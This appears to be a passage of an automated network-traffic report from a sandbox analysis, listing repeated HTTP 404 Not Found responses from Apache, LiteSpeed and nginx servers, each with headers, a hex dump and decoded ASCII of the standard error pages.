Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:22:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:22:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 15 Nov 2024 03:22:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 15 Nov 2024 03:22:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 15 Nov 2024 03:22:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 15 Nov 2024 03:22:52 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:13 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:18 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:20 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
